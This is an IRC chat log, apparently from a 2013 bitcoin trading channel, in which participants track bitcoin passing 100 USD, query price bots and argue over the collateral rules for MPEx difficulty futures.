sure what to think here Apr 01 15:49:50 4 hours we will be thru 100... Apr 01 15:49:54 guess Apr 01 15:50:35 my pendulum says Wednesday is when we break through 100 strongly :) Apr 01 15:53:31 is possible Apr 01 15:53:39 [BTCTC] [BASIC-MINING] 3 @ 0.35 = 1.05 BTC [-] Apr 01 15:53:42 [BTCTC] [BASIC-MINING] 1 @ 0.38 BTC [+] Apr 01 15:56:48 "One popular theory among Russian bloggers speculates that Nakamoto is Grigory Perelman" Apr 01 15:56:54 Hadn't heard that theory before Apr 01 15:57:06 as if Grigory gives 1 shit about the real world... Apr 01 15:59:01 getting ready to break ATH Apr 01 16:00:02 ;;ticker Apr 01 16:00:08 BTCUSD ticker | Best bid: 98.00001, Best ask: 98.00002, Bid-ask spread: 0.00001, Last trade: 98.30000, 24 hour volume: 38913.06244008, 24 hour low: 91.00000, 24 hour high: 98.41000, 24 hour vwap: 94.18840 Apr 01 16:01:28 ;;bids 0 Apr 01 16:01:35 There are currently 34850576 bitcoins demanded at or over 0.0 USD, worth 10026671.1919 USD in total. | Data vintage: 0.0091 seconds Apr 01 16:05:41 ColdHardMetal Ready for 2 million Best Korians to come for a visit? :) Apr 01 16:07:44 not worried in the slightest. Apr 01 16:10:10 he just be trollin? Apr 01 16:10:25 http://www.google.co.uk/intl/en/landing/nose/ Apr 01 16:10:38 Bugpowder im pretty sure it's not perelman Apr 01 16:13:32 wtf yes sell all btc asap Apr 01 16:14:10 what is wrong with some people..idk maybe its me Apr 01 16:14:13 [MPEX] [O.USD.C104T] 200 @ 0.19960593 = 39.9212 BTC Apr 01 16:15:27 not a very glowing reception of bitcoin - http://www.businessinsider.com/is-bitcoin-money-2013-4 Apr 01 16:17:04 i dont think it can be used as money..how would the transactions keep up at that rate..ex. transactional data from just amex alone would choke the network Apr 01 16:17:14 maybe a financial tool yes Apr 01 16:18:07 facilitate transfer of wealth..idk Apr 01 16:18:46 well, I see money laundering a big red flag that detractors can use... Apr 01 16:19:19 yeah..its been used as that since day 1 prolly Apr 01 16:19:21 the question is will the US make some illegal simply because there is no way to regulate it? Apr 01 16:19:51 pgp there is no such thing as "money laundering". Apr 01 16:20:40 not in bitcoin terms, I suppose not... a transfer is a transfer... Apr 01 16:20:45 yup Apr 01 16:20:48 pecunia non olet. Apr 01 16:20:56 actually... http://trilema.com/2013/time-for-europe-to-repeal-the-us-backed-aml-crap/ Apr 01 16:22:07 in pecunium veritas? Apr 01 16:23:04 that may be taking it a little too far. Apr 01 16:25:33 lol Apr 01 16:26:04 ;;asks 99.999 Apr 01 16:26:12 There are currently 7047.7282 bitcoins offered at or under 99.999 USD, worth 698874.017257 USD in total. | Data vintage: 0.0017 seconds Apr 01 16:30:54 [MPEX] [O.USD.C098T] 1000 @ 0.226871 = 226.871 BTC [+] Apr 01 16:31:45 ;;calc 98/(1-.226871) Apr 01 16:31:45 126.757630357 Apr 01 16:31:57 [MPEX] [S.MPOE] 11700 @ 0.0006 = 7.02 BTC [-] Apr 01 16:32:06 126 :) im sure we will be there by the end of the month Apr 01 16:33:10 maybe so Apr 01 16:34:38 !ticker HIM Apr 01 16:34:38 Are you sure you have no tobacco? Apr 01 16:34:43 !ticker h HIM Apr 01 16:34:44 [HAVELOCK:HIM] 1D: 2.00000000 / 2.00913043 / 2.06000000 (46 shares, 92.42000000 BTC), 7D: 1.41000000 / 1.79383584 / 2.08000000 (226 shares, 405.40690096 BTC), 30D: 1.40000000 / 1.78069269 / 2.08000000 (759 shares, 1351.54575265 BTC) Apr 01 16:35:04 98.7 Apr 01 16:35:09 ;;seen smickles Apr 01 16:35:10 smickles was last seen in #bitcoin-assets 6 hours, 58 minutes, and 33 seconds ago: srs Apr 01 16:36:19 if burnside doesnt move my ltc for 6+ hours again i will be a sad panda, unless of course the delay stops me from selling off too early Apr 01 16:37:30 why are people trading ltc? Apr 01 16:37:41 Must be a lot like silver now Apr 01 16:38:05 it's at 1.22USD right now Apr 01 16:38:14 about double from a week ago Apr 01 16:38:42 what's the market cap of ltc? Apr 01 16:39:17 couple million I would think at this point Apr 01 16:39:37 ;;bc,24hprc Apr 01 16:39:37 Error: "bc,24hprc" is not a valid command. Apr 01 16:39:42 ;;avg Apr 01 16:39:43 Error: "avg" is not a valid command. Apr 01 16:39:45 like 10mn ? Apr 01 16:40:07 mircea_popescu: what is the new 24hr price command for gribble? Apr 01 16:40:13 ;;seen nanotube Apr 01 16:40:13 nanotube was last seen in #bitcoin-assets 9 hours, 38 minutes, and 44 seconds ago: dub: ^ see this page for updated command guide Apr 01 16:40:18 $avgpc Apr 01 16:40:19 i have no idea Apr 01 16:40:26 :/ Apr 01 16:40:26 $avgpc Apr 01 16:40:31 ;;avgpc Apr 01 16:40:32 Error: "avgpc" is not a valid command. Apr 01 16:40:33 ;;avgprc Apr 01 16:40:34 (avgprc ) -- Returns volume-weighted average price data from MtGox. is a three-letter currency code, is the time window for the average, and can be '24h', '7d', or '30d'. Apr 01 16:40:43 ;;avgprc USD 24h Apr 01 16:40:48 94.32 Apr 01 16:40:52 $avg Apr 01 16:40:53 ThickAsThieves: 94.32 Apr 01 16:40:56 ;;ticker Apr 01 16:40:57 there it is Apr 01 16:41:03 BTCUSD ticker | Best bid: 98.77000, Best ask: 98.81000, Bid-ask spread: 0.04000, Last trade: 98.81000, 24 hour volume: 40195.63814671, 24 hour low: 91.00000, 24 hour high: 98.79000, 24 hour vwap: 94.41626 Apr 01 16:45:04 99 Apr 01 16:45:08 mircea_popescu, how do I know what the top payout is for an IDIFF I purchased? Apr 01 16:45:38 the top you don't know. you know what the bottom is. Apr 01 16:45:45 here comes 100 Apr 01 16:45:52 is there a minimum % required? Apr 01 16:46:11 if i buy at .13, top could be .131 then? Apr 01 16:46:22 99.1 ... wonder what bitcoinity has in store for 100 Apr 01 16:46:59 ThickAsThieves : from the page Apr 01 16:47:00 Unlike other futures X.IDIFF.* will require 2.9x the difficulty at last settlement for each quarter out, so for instance if traded in January 2013 X.IDIFF.MAR will require 0.097735278 BTC per contract as collateral whereas X.IDIFF.DEC will require 2.383665695 BTC per contract as collateral (all numeric examples based on 3370182 as last settlement difficulty value). Apr 01 16:47:06 if it's current period, 2.9x Apr 01 16:47:15 if it's 9 months+ away, 2.9**4x Apr 01 16:47:29 ;;calc 2.9*0.048 Apr 01 16:47:30 0.1392 Apr 01 16:47:36 so the JUNE would require 2.9x the sale price? Apr 01 16:47:40 ^ should not be lower than that Apr 01 16:47:59 oh Apr 01 16:48:02 not sale price. 2.9*current difficulty Apr 01 16:48:23 not current, but most recently settled Apr 01 16:48:39 ic Apr 01 16:48:41 last settlement yes Apr 01 16:48:50 that's a lil gay Apr 01 16:48:59 why ? Apr 01 16:49:09 so the difficulty based on futures is going to speculated to be betwen 8.9mn and 45mn.... Apr 01 16:49:34 99.9 Apr 01 16:49:41 cuz i bougth june at 0.1375 yesterday Apr 01 16:49:50 so now i'm stuck giving someone a cheap loan Apr 01 16:50:15 i don't follow. Apr 01 16:50:54 my max payout is potentially only 1.22% profit Apr 01 16:51:01 for 2mos Apr 01 16:51:10 correct? Apr 01 16:51:19 [MPEX] [O.USD.C095T] 100 @ 0.2437597 = 24.376 BTC [+] Apr 01 16:51:24 a, possibly. Apr 01 16:51:37 much more concerning would be the possibility diff doesn't go over 13.75mn by july tho Apr 01 16:51:38 why are people buying options so early Apr 01 16:51:47 99.95 :) Apr 01 16:51:53 top liability should be disclosed Apr 01 16:51:54 ;;ticker Apr 01 16:51:56 25 days out is early ?! Apr 01 16:52:00 BTCUSD ticker | Best bid: 99.01000, Best ask: 99.90000, Bid-ask spread: 0.89000, Last trade: 99.95156, 24 hour volume: 44641.62362351, 24 hour low: 91.00000, 24 hour high: 99.95000, 24 hour vwap: 94.89046 Apr 01 16:52:06 Yea mang Apr 01 16:52:13 where is smickles when this action is going on Apr 01 16:52:16 ThickAsThieves minimal coverage is discolosed tho, that's what that contract is there for. Apr 01 16:52:20 I need to interface with his bot Apr 01 16:52:43 $avg Apr 01 16:52:45 thestringpuller: 94.69 Apr 01 16:53:06 ;;asks 99.9 Apr 01 16:53:06 yes, but my bull-in-china-shop approach to things doesn't jive with reading things closely sometimes :/ Apr 01 16:53:09 There are currently 0 bitcoins offered at or under 99.9 USD, worth 0.0 USD in total. | Data vintage: 75.3115 seconds Apr 01 16:53:21 ;;ticker Apr 01 16:53:27 BTCUSD ticker | Best bid: 99.01000, Best ask: 99.90000, Bid-ask spread: 0.89000, Last trade: 99.01000, 24 hour volume: 44641.62362351, 24 hour low: 91.00000, 24 hour high: 99.95000, 24 hour vwap: 94.89046 Apr 01 16:54:01 if the top liability was disclosed it would allow for better offers as well Apr 01 16:54:16 rather than a minimum Apr 01 16:54:29 thanks to bug's support tesla is about to buy apple :D Apr 01 16:54:49 ThickAsThieves ya well, there's no practical way to disclose top exposure tho. Apr 01 16:55:10 add a field for it? Apr 01 16:55:32 mircea_popescu: now is the time to sell options Apr 01 16:55:45 not to mess with your craiglist approach to feature development or anything :P Apr 01 16:55:47 buy them toward the end based on the fact the time factor plays a huge role in the pricing Apr 01 16:56:01 thestringpuller perhaps. Apr 01 16:56:31 ThickAsThieves it's not just a simple matter of a field. Apr 01 16:56:38 oh i know Apr 01 16:56:51 it's probably also not a a matter of brain surgery Apr 01 16:56:52 think about it : today someone makes a 4 quarters out option Apr 01 16:57:11 he has to pay 70x last settlement in collateral. Apr 01 16:57:22 two quarters pass. diff goes up only 100% Apr 01 16:57:32 now, somebody wants to make 1000 options. Apr 01 16:57:41 if he has to pay 70x this is absurd Apr 01 16:57:46 if he pays less it dillutes the original. Apr 01 16:58:17 they could simply be written as offer price, max payout price, with no relation to past settlements, no? Apr 01 16:58:53 no. Apr 01 16:59:01 because executions must be allocated uniformly to old and new contracts. Apr 01 16:59:59 if i resell these at .15 and theyre original top is .139, what happens for the new buyer? Apr 01 17:00:06 their* Apr 01 17:00:16 he makes .139 if he exercises. Apr 01 17:00:47 si it's possible for me to sell at a price that has 0% of profit Apr 01 17:00:51 sure. Apr 01 17:00:55 :/ Apr 01 17:00:58 it's possible for you to sell at any price you wish, Apr 01 17:01:03 as long as someone accepts it Apr 01 17:01:04 hehe Apr 01 17:01:13 i mean i understand it, but really i dont Apr 01 17:01:46 lol that's a new one Apr 01 17:01:55 let's go through a full example. Apr 01 17:02:11 sure Apr 01 17:02:15 today is april 1st. the last settlement was 7mn. Apr 01 17:02:16 lets use my example if possible Apr 01 17:02:30 Buy X.IDIFF.JUN 60 0.1375 -8.25 Apr 01 17:02:39 if you create one X.IDIFF.MAR future, you will have to pay 2.9**4*.07 as collateral. Apr 01 17:02:46 ;;calc 2.9**4*.07 Apr 01 17:02:46 4.950967 Apr 01 17:02:58 so you deposit 4.95btc, get your X.IDIFF.MAR. Apr 01 17:03:01 [HAVELOCK] [SDICE] 7 @ 0.44699999 = 3.129 BTC [+] Apr 01 17:03:14 now, nothing happens until February 2014. Apr 01 17:03:22 at which point last settlement diff is 16mn. Apr 01 17:03:33 how much should someone have to pay per option at that date ? Apr 01 17:03:46 as collateral, to create one i mean. Apr 01 17:03:47 ;;bids Apr 01 17:03:47 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Apr 01 17:03:51 ;;bids 0 Apr 01 17:03:51 There are currently 34918304 bitcoins demanded at or over 0.0 USD, worth 10082902.8829 USD in total. | Data vintage: 74.5978 seconds Apr 01 17:05:01 [HAVELOCK] [SDICE] 3 @ 0.447 = 1.341 BTC [+] Apr 01 17:05:10 some sill bear is making a new wall lol Apr 01 17:05:13 46400000? Apr 01 17:05:24 how did you figure ? Apr 01 17:05:39 16mil times 2.9 Apr 01 17:05:47 okay. Apr 01 17:06:12 now if you had bought a contract back in july thinking it's 4.95 covered Apr 01 17:06:20 and someone makes a contract now which is 0.46 covered Apr 01 17:06:20 100 Apr 01 17:06:33 you will only get ~half of what you originally thought you will get. Apr 01 17:06:39 fuck yeah Apr 01 17:06:42 muhahaha Apr 01 17:06:45 congrats everyone Apr 01 17:06:52 what i meant was Apr 01 17:07:03 bitcoinity bringing the lulz today. Apr 01 17:07:10 if the futures were simply offered under simpler terms at will, wouldnt that still work Apr 01 17:07:12 as in, Apr 01 17:07:29 i make one anytime i want for any amount, covered to any man payout i want Apr 01 17:07:36 man=max Apr 01 17:07:45 so what's the buyer buy ? Apr 01 17:07:55 for example Apr 01 17:08:03 [MPEX] [S.DICE] 2850 @ 0.004 = 11.4 BTC [+] Apr 01 17:08:08 no example. if you make contracvts any way you want, what's the buyer supposed to buy ? Apr 01 17:08:08 [MPEX] [S.DICE] 2000 @ 0.00352101 = 7.042 BTC [-] Apr 01 17:08:09 [MPEX] [S.DICE] 1500 @ 0.003521 = 5.2815 BTC [-] Apr 01 17:08:11 4k buy order at 100 nice Apr 01 17:08:11 [MPEX] [S.DICE] 43 @ 0.00351201 = 0.151 BTC [-] Apr 01 17:08:12 [MPEX] [S.DICE] 1000 @ 0.0032101 = 3.2101 BTC [-] Apr 01 17:08:13 [MPEX] [S.DICE] 18408 @ 0.00310002 = 57.0652 BTC [-] Apr 01 17:08:14 [MPEX] [S.DICE] 6386 @ 0.00310002 = 19.7967 BTC [-] Apr 01 17:08:15 that wall wont last long Apr 01 17:08:18 they obviously become unfungible now. Apr 01 17:08:21 [MPEX] [S.DICE] 3000 @ 0.00310001 = 9.3 BTC [-] Apr 01 17:08:22 [MPEX] [S.DICE] 7125 @ 0.0031 = 22.0875 BTC [-] Apr 01 17:08:24 [MPEX] [O.USD.C104T] 643 @ 0.20288146 = 130.4528 BTC [+] Apr 01 17:08:36 i put up collateral for my max payout Apr 01 17:08:41 and make offer below that Apr 01 17:08:55 and disclose max payout Apr 01 17:09:03 then buyer decides value Apr 01 17:09:08 now what? Apr 01 17:09:22 like Jurov's Apr 01 17:09:28 so each and every single contract has to be specified independently. Apr 01 17:09:38 that's not how standardized contracts work. Apr 01 17:09:42 you could have limits if you like Apr 01 17:09:55 i do like, and i do have limits. Apr 01 17:10:03 that's exactly it : you know you won't get less than x. Apr 01 17:10:30 okay at least could be authoritatively shown Apr 01 17:10:40 beacuse last settlement was not 0.07 iirc Apr 01 17:10:48 but 0.048 Apr 01 17:10:53 okay but right now no one can offer a reasonable IDIFF for June right? Apr 01 17:11:01 ThickAsThieves why not ? Apr 01 17:11:13 jurov yeah but mpex is not a datasource. Apr 01 17:11:22 because odds are that the diff will be much higher than your minimum payout Apr 01 17:11:40 ;;asks 100.1 Apr 01 17:11:41 ThickAsThieves higher than ~12mn ? Apr 01 17:11:43 yes mpex is do ur own research Apr 01 17:11:48 There are currently 1143.0168 bitcoins offered at or under 100.1 USD, worth 114294.520819 USD in total. | Data vintage: 0.0008 seconds Apr 01 17:11:59 jurov like, if you don't know what btc/usd is you can't trade options Apr 01 17:12:01 [HAVELOCK] [SDICE] 3 @ 0.4216 = 1.2648 BTC [-] Apr 01 17:12:03 [HAVELOCK] [SDICE] 1 @ 0.4215005 BTC [-] Apr 01 17:12:04 [HAVELOCK] [SDICE] 6 @ 0.42150003 = 2.529 BTC [-] Apr 01 17:12:04 [HAVELOCK] [SDICE] 1 @ 0.42150001 BTC [-] Apr 01 17:12:05 [HAVELOCK] [SDICE] 11 @ 0.421 = 4.631 BTC [-] Apr 01 17:12:05 if you don't know what diff was you can't trade futures Apr 01 17:12:06 etc. Apr 01 17:12:06 [HAVELOCK] [SDICE] 5 @ 0.42 = 2.1 BTC [-] Apr 01 17:12:07 [HAVELOCK] [SDICE] 10 @ 0.41 = 4.1 BTC [-] Apr 01 17:12:08 [HAVELOCK] [SDICE] 1 @ 0.40678129 BTC [-] Apr 01 17:12:09 [HAVELOCK] [SDICE] 4 @ 0.40005 = 1.6002 BTC [-] Apr 01 17:12:10 [HAVELOCK] [SDICE] 31 @ 0.40000001 = 12.4 BTC [-] Apr 01 17:12:11 [HAVELOCK] [SDICE] 1 @ 0.4 BTC [-] Apr 01 17:12:12 [HAVELOCK] [SDICE] 1 @ 0.397 BTC [-] Apr 01 17:12:13 [HAVELOCK] [SDICE] 5 @ 0.396 = 1.98 BTC [-] Apr 01 17:12:23 ;;estimate Apr 01 17:12:23 [MPEX] [O.USD.C104T] 7 @ 0.20551087 = 1.4386 BTC [+] Apr 01 17:12:29 Next difficulty estimate | 7647329.85957 based on data since last change | 8527812.32019 based on data for last three days Apr 01 17:12:42 8.5mil coming up Apr 01 17:12:44 ;;bids 0 Apr 01 17:12:45 There are currently 35118439 bitcoins demanded at or over 0.0 USD, worth 9804244.95426 USD in total. | Data vintage: 57.1263 seconds Apr 01 17:12:52 ThickAsThieves obviously it's a trade-off. 2.9 might not be optimal in some fringe cases Apr 01 17:12:58 mircea_popescu but you know now how easy is to get false information Apr 01 17:13:00 so idiff June at 14mil is useless Apr 01 17:13:02 but otherwise it imposes a capital burden on underwriters. so it is guesswork Apr 01 17:13:11 jurov how do you mean ? Apr 01 17:13:27 you just shoot the 0.07 number which isn't true Apr 01 17:13:32 ThickAsThieves hopefully the network stabilises and we'll be fine. Apr 01 17:13:35 if you don't know it, who can? Apr 01 17:13:39 jurov i was giving a didactic example. Apr 01 17:13:44 i wasn't proposing it's actual case. Apr 01 17:13:53 just came up with some numbers. Apr 01 17:14:20 well, certain MPBPT investors almost felt liek lynching me cuz such "examples" Apr 01 17:14:27 better clearly mark them Apr 01 17:15:06 do you agree that the odds of IDIFFJUN closing at any sort of profit are nigh impossible? Apr 01 17:15:07 okay, not to get flamey, for public record: Apr 01 17:15:25 March settlement was 0.04847647 Apr 01 17:15:36 so minimal JUN collateral is Apr 01 17:15:45 ;;calc 0.04847647*2.9 Apr 01 17:15:46 0.140581763 Apr 01 17:16:18 why offer options that are born to lose? Apr 01 17:16:58 zomg, bitcoin 100 Apr 01 17:17:03 ;;ticker Apr 01 17:17:06 here come the post 100 froth... Apr 01 17:17:07 101 like a shot Apr 01 17:17:15 BTCUSD ticker | Best bid: 100.00000, Best ask: 100.90000, Bid-ask spread: 0.90000, Last trade: 99.98000, 24 hour volume: 53736.31362686, 24 hour low: 91.00000, 24 hour high: 100.00000, 24 hour vwap: 95.75237 Apr 01 17:17:56 my iphone ticker cant display the price?? Apr 01 17:18:12 maximal collateral would be Apr 01 17:18:26 ;;calc 2.9*2.9*2.9*0.01137814 Apr 01 17:18:27 0.27750145646 Apr 01 17:18:27 Bugpowdurr ahaha Apr 01 17:18:42 ThickAsThieves i have no idea. prolly, if any serious hash is delivered. Apr 01 17:18:44 if i'm taking September 19 into account Apr 01 17:18:49 stuck at 99.98 Apr 01 17:19:13 so my point is, change your system to one that works Apr 01 17:19:18 in the real world Apr 01 17:19:22 rather than just on paper Apr 01 17:19:25 ThickAsThieves listen : i could make minimum collateral 1000x. Apr 01 17:19:40 then the system "would work" in all fringe cases, except nobody will depost 1k btc for a 1btc contract Apr 01 17:19:46 so it wouldn't work at all. Apr 01 17:19:51 you are jumping to extremes Apr 01 17:20:01 of course i am. this is exactly what we have here, an extreme Apr 01 17:20:01 there's lotsa room in the middle Apr 01 17:20:10 ie, a case where diff increases > 3x during 3 months. this isn't normal. Apr 01 17:20:32 it's normal all year most likely Apr 01 17:20:44 would you prefer the futures be useless all year? Apr 01 17:21:05 i'm not increasing collateral maargin for the simple reason that even as it is underwriting is dismal. Apr 01 17:21:09 so it'd be pointless pretty much. Apr 01 17:21:10 for me it would be sufficient if mp publishes basic data, like past settlement values or option autoexercise vwap prices Apr 01 17:21:29 or if that's beyond mpex mission, then don't show dividends either Apr 01 17:21:45 just feels stubborn to me, you could be offering a feature that people would use much more Apr 01 17:21:53 jurov dividends are shown as the sum of div transactions in mpex. Apr 01 17:21:56 ;;asks 110 Apr 01 17:22:00 There are currently 8865.2797 bitcoins offered at or under 110.0 USD, worth 940190.755187 USD in total. | Data vintage: 5.5899 seconds Apr 01 17:22:09 ThickAsThieves you are not reading it seems. CURRENTLY, at 2.9x, NOBODY is underwrtiting it. Apr 01 17:22:19 if it were 3.1x, even less than nobody would be underwriting it. Apr 01 17:22:25 do you follow that ? Apr 01 17:22:59 you are interpreting my solution as only a change in min collateral Apr 01 17:23:02 i never suggested that Apr 01 17:23:17 you did Apr 01 17:23:18 ok, well... the other thing i got was "make each idifff a different, user specified contract" Apr 01 17:23:32 this doesn't work, because market traded contracts have to be standardised. Apr 01 17:23:34 ie, all the same. Apr 01 17:23:37 at the core, what i'm syaing is, make them usable Apr 01 17:23:47 that's like saying grow tits. Apr 01 17:23:54 lol Apr 01 17:24:01 or you know, make pigs fly. Apr 01 17:24:03 sure, why not. Apr 01 17:24:09 not quite Apr 01 17:24:11 well ? Apr 01 17:24:17 then why do jurov's work fine? Apr 01 17:24:34 he has extra tits? Apr 01 17:24:40 cuz i'm using abhorrent practice of magic numbers Apr 01 17:24:59 ;;ticker Apr 01 17:25:05 BTCUSD ticker | Best bid: 100.98001, Best ask: 101.00000, Bid-ask spread: 0.01999, Last trade: 101.00000, 24 hour volume: 54713.02069310, 24 hour low: 91.00000, 24 hour high: 101.00000, 24 hour vwap: 95.83748 Apr 01 17:25:42 and also marketmaking them Apr 01 17:25:58 define "Work fine" in this context Apr 01 17:26:19 they use a price that is reasonable, for a potential payout that is reasonable Apr 01 17:26:30 can you underwrite some with jurov and sell them to him ? Apr 01 17:26:40 if i asked him maybe Apr 01 17:26:44 without asking him. Apr 01 17:26:47 through a process. Apr 01 17:26:52 otherwise this is simply an otc trade. Apr 01 17:26:56 ok, you need a NEW process Apr 01 17:27:05 no. i have a process, he is doing otc. Apr 01 17:27:11 this is perfectly fine, but they are different things. Apr 01 17:27:26 for example, you could say DIFF futures can be written at any price, but you must offer 125% collateral for potential profit of buyer Apr 01 17:27:34 you can still limit close dates Apr 01 17:27:36 and increments Apr 01 17:27:37 125% OF WHAT. Apr 01 17:27:51 underwriters chosen price Apr 01 17:27:55 ... Apr 01 17:27:59 that's a point. but converting it into a process would be easy if ukto makes apis public. Apr 01 17:28:02 so if you choose 1 satoshi ? Apr 01 17:28:07 the conditions are clear. Apr 01 17:28:11 then no one will buy Apr 01 17:28:16 [BTCTC] [COGNITIVE] 2 @ 0.2899 = 0.5798 BTC [+] Apr 01 17:28:18 you're not thinking very well. Apr 01 17:28:25 he makes the chosen price 1 satoshi, deposts 1.25 satoshi per Apr 01 17:28:32 then sells them for .05 btc each and withdraws. Apr 01 17:28:39 no Apr 01 17:28:39 you've just made mpex bankrupt. Apr 01 17:28:41 no Apr 01 17:28:54 sells them for 1 satishi Apr 01 17:29:07 so what, if he cancels the bid the futures dissapear from his account ? Apr 01 17:29:20 so you make the minimum price the current diff Apr 01 17:29:25 o i see. Apr 01 17:29:31 well here's the beauty : this is already implemented. Apr 01 17:29:40 he has to deposit 290% of the PREVIOUS DIFF Apr 01 17:29:47 bam. Apr 01 17:29:59 previous = current now? Apr 01 17:30:01 nope Apr 01 17:30:04 last settlement. Apr 01 17:30:05 ;;ticker Apr 01 17:30:14 BTCUSD ticker | Best bid: 101.05100, Best ask: 101.50000, Bid-ask spread: 0.44900, Last trade: 101.05100, 24 hour volume: 56319.87614438, 24 hour low: 91.00000, 24 hour high: 101.00000, 24 hour vwap: 95.98390 Apr 01 17:30:21 why does last settlement matter to anyone? Apr 01 17:30:22 boom. triple digits. Apr 01 17:30:29 yay Apr 01 17:30:39 ThickAsThieves that's how futurtes work. settlement to settlement. Apr 01 17:30:40 [BTCTC] [BTC-TRADING-PT] 5 @ 0.15299 = 0.765 BTC [+] Apr 01 17:30:43 [BTCTC] [BTC-TRADING-PT] 8 @ 0.153 = 1.224 BTC [+] Apr 01 17:30:51 [BTCTC] [BTC-TRADING-PT] 1 @ 0.154 BTC [+] Apr 01 17:30:55 [BTCTC] [BTC-TRADING-PT] 6 @ 0.155 = 0.93 BTC [+] Apr 01 17:31:43 it's okay, i see your take on it, and wanting to use hard numbers, but all i'm trying to do is get you to open the idea of finding a formula that is more likely to be useful in the current environment Apr 01 17:31:59 i don't see a problem with formula Apr 01 17:32:19 just that it needs research what the previous settlements were Apr 01 17:32:32 how would you change it Apr 01 17:32:53 then investor comes to result that it's covered somewhere between 0.14 and 0.27 Apr 01 17:33:18 then asks mp, how much it is exactly, mp refuses Apr 01 17:33:27 so investor goes away Apr 01 17:33:50 unnecessarily complicated process, i say Apr 01 17:34:37 man, those sure are some cheap IDIFFJUN futures listed, someone should snatch them up Apr 01 17:34:41 just cuz "mpex isnt data platform" Apr 01 17:37:05 or perhaps mp expects someone other do do all the computations and dirty work, but that isn't working Apr 01 17:37:25 few fools are willing to invest into anything mpex-related Apr 01 17:37:30 micrea_popescu, can I get a deposit cleared Apr 01 17:39:30 litecoin singularity Apr 01 17:39:41 .0145 BTC/LTC Apr 01 17:40:08 yeah Apr 01 17:40:16 it is awesomely insane Apr 01 17:40:17 deposits flushed. Apr 01 17:40:23 jurov i don't think that's particularly fair. Apr 01 17:40:25 Thanks Apr 01 17:40:33 for one settlement was announced in here when it happened. Apr 01 17:40:33 ltc goes from 5 cents to $1.40 in no time Apr 01 17:40:38 for the other, just read the graph wtf. Apr 01 17:40:41 [BTCTC] [GSDPT] 5 @ 0.00401 = 0.0201 BTC [+] Apr 01 17:40:43 [BTCTC] [GSDPT] 53 @ 0.004005 = 0.2123 BTC [-] Apr 01 17:40:46 [BTCTC] [GSDPT] 815 @ 0.004 = 3.26 BTC [-] Apr 01 17:40:48 [BTCTC] [GSDPT] 99 @ 0.004 = 0.396 BTC [-] Apr 01 17:41:07 ThickAsThieves the 15.8mn ? so get them Apr 01 17:41:56 they are worthless no? Apr 01 17:42:10 well, worth less Apr 01 17:42:14 right? Apr 01 17:43:05 [BTCTC] [ASICMINER-PT] 1 @ 0.74996 BTC [-] Apr 01 17:43:18 their max payout is last settlement * 2.9, which is < the sell price Apr 01 17:43:55 i know i'm unfair and disgruntled sometimes... but you seem really to have a problem even to hire PR and evangelist Apr 01 17:44:14 jurov how is this my problem you figure ? Apr 01 17:44:28 as as a someone who tried to "evangelize" MPEx i think i know why Apr 01 17:44:37 [MPEX] [S.DICE] 6300 @ 0.00367331 = 23.1419 BTC [+] Apr 01 17:44:43 you go to finance conferences ?! Apr 01 17:45:05 not, just some meetings Apr 01 17:45:13 kay... Apr 01 17:45:23 so what do you know ? Apr 01 17:45:32 ;;goxlag Apr 01 17:45:38 73.292636 seconds Apr 01 17:45:55 well, i explain what i'm doing, what is mpex Apr 01 17:46:17 dig some links deep from trilema, praying they don't hit the paywall Apr 01 17:46:46 am asked to explain who is this mircea popescu again, i handwave it Apr 01 17:47:21 then they find out about MPOE-PR :) Apr 01 17:47:39 or even if they can get past her Apr 01 17:48:01 "what? so all there is is option speculation, betting site and casino?" Apr 01 17:48:09 lol Apr 01 17:48:14 idiff Apr 01 17:48:39 i know it's unfair judgement, but i just aren;t apt enough to explain past that point Apr 01 17:48:40 who are these people ? Apr 01 17:49:22 not bankers. managers of small/medium IT companies Apr 01 17:49:44 but it don't think bankers would be much different even if i could reach them Apr 01 17:50:16 ;;ticker Apr 01 17:50:23 BTCUSD ticker | Best bid: 103.90000, Best ask: 104.00000, Bid-ask spread: 0.10000, Last trade: 103.90000, 24 hour volume: 60517.76520989, 24 hour low: 91.00000, 24 hour high: 104.00000, 24 hour vwap: 96.47673 Apr 01 17:50:27 but i mean... Apr 01 17:50:30 love this price action Apr 01 17:50:39 lol ltc not going to stop Apr 01 17:50:57 chaang, the walls are being torn to bits! Apr 01 17:51:04 i read this and what i see is "i couldn't make people living in queens understand what the schmier is with stock options. i'm sure high powered executives would bne the same" Apr 01 17:51:07 what sense does that make Apr 01 17:51:42 okay, maybe thare is a big difference, i don't know Apr 01 17:51:58 just my small queens reality Apr 01 17:52:17 makes me bitter :( Apr 01 17:52:35 don't get bitter. Apr 01 17:53:29 understand : the general public is very dangeours (chiefly to itself) in any sort of functionuing marketplace. Apr 01 17:53:37 we'll have to take them in slowly and selectively. Apr 01 17:54:14 it occurs to me you want to skip mass market completely and soar directly into high finance Apr 01 17:54:26 do you have previous experience with such? Apr 01 17:55:02 hundred dolla bill yo Apr 01 17:55:57 ''ticker Apr 01 17:56:00 ;;ticker Apr 01 17:56:06 BTCUSD ticker | Best bid: 103.47500, Best ask: 103.50000, Bid-ask spread: 0.02500, Last trade: 103.50000, 24 hour volume: 60517.76520989, 24 hour low: 91.00000, 24 hour high: 104.00000, 24 hour vwap: 96.47673 Apr 01 17:56:10 there's no mass market of bitcoin securities ;/ Apr 01 17:56:30 and yes, but local and mostly unofficial. Apr 01 17:57:42 i mean, buffett can say "2.9x last settlement value" and everyone can easily look up authoritative source Apr 01 17:57:58 i admit the 2.9x is just some number i took out of my ass. Apr 01 17:58:10 (well, we had a board meeting, but anyway) Apr 01 17:58:18 what'd you want me do ? i can't increase it. Apr 01 17:58:25 they have something to bootfstrap from. but for bitcoin best i can find is some google spreadsheet of past difficulty values Apr 01 17:58:35 um Apr 01 17:58:40 there's sipa's thing no ? Apr 01 17:58:55 is he providing csv or like? Apr 01 17:59:33 this by Stephen Gornick: https://spreadsheets.google.com/pub?hl=en&hl=en&key=0AmcTCtjBoRWUdHVRMHpqWUJValI1RlZiaEtCT1RrQmc Apr 01 17:59:34 perhaps best to ask him, buit in general speaking the problems of access to market data Apr 01 17:59:45 while significant for a trading place, are NOT to be solved by the trading place itself. Apr 01 17:59:54 it's very important to have sepparate data feeds and trading, Apr 01 18:00:17 because it insulates from market manipulation accusations. Apr 01 18:01:24 or in other words : my insistence in implementing correct designs or nothing at all, and decentralisations such as these may make me look like an idiot today Apr 01 18:01:40 but i'm pretty darned certain will save everyone a shitton of sweat, blood and tears in five years. Apr 01 18:01:58 no data feed needed to fix diff futures Apr 01 18:02:30 but they would indeed need more than a factor change Apr 01 18:02:47 